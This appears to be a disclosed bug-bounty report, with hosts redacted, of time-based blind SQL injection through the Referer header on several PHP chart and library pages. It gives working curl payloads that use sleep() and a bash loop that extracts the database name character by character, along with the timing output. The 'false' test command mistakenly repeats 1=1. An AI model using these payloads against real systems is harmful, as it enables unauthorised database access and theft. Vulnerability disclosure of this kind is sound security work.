[████] SQL Injections on Referer Header exploitable via Time-Based method

**Summary:** SQL Injections on Referer Header exploitable via Time-Based method **Description:** https://owasp.org/www-community/attacks/SQL_Injection ## Impact https://owasp.org/www-community/attacks/SQL_Injection ## Step-by-step Reproduction Instructions First, vulnerable points: https://███████/███████/library.php?alert= https://██████████/████████/Chart01.php?alert= https://████████/████/Chart02.php?alert= https://██████████/█████████/Chart03.php?alert= https://████/█████Prod.php?alert= https://██████████/█████systems.php?alert= https://█████████/██████████db.php?alert= (Don't miss the alert GET parameter...) Okay, let's check the SQLi... lets use time and curl with a true condition (1=1), if 1=1, then, the server sleep 20 seconds else nothing (I just wrote false to make it explicit for you): ```time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'" --url "https://████████/█████/Chart01.php?alert=" ``` Okay..then.. let's check the response: ```Thank you - you may close this window real 0m21,447s user 0m0,029s sys 0m0,000s``` The time is 21 seconds.. then.. let's update the if condition as false (1=2) ```time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'" --url "https://████████/████████/Chart01.php?alert=" ``` Response: ```Thank you - you may close this window real 0m1,806s user 0m0,016s sys 0m0,008s``` Hmm.. approx 2 seconds.. we have proof that's vuln.. let's try more.. I want the first character of the current database name.. let's go for it!: ```for i in {{a..z},{1..9}}; do echo "Testing $i char:"; time curl -s -H "Referer: '+(select*from(select(if(substring(database(),1,1)='$i',sleep(20),false)))a)+'" --url "https://████/██████/Chart01.php?alert="; done``` And there are only one-second answers from time except for the m! ``` Testing l char: Thank you - you may close this window real 0m1,321s user 0m0,028s sys 0m0,000s Testing m char: Thank you - you may close this window real 0m21,299s user 0m0,019s sys 0m0,010s Testing n char: Thank you - you may close this window real 0m1,331s user 0m0,016s sys 0m0,012s ``` Thanks for reading! There is one of these injection points that is supposedly fixed at report #995122 (report disclosed, resolved.. but it's not..) ## Impact https://owasp.org/www-community/attacks/SQL_Injection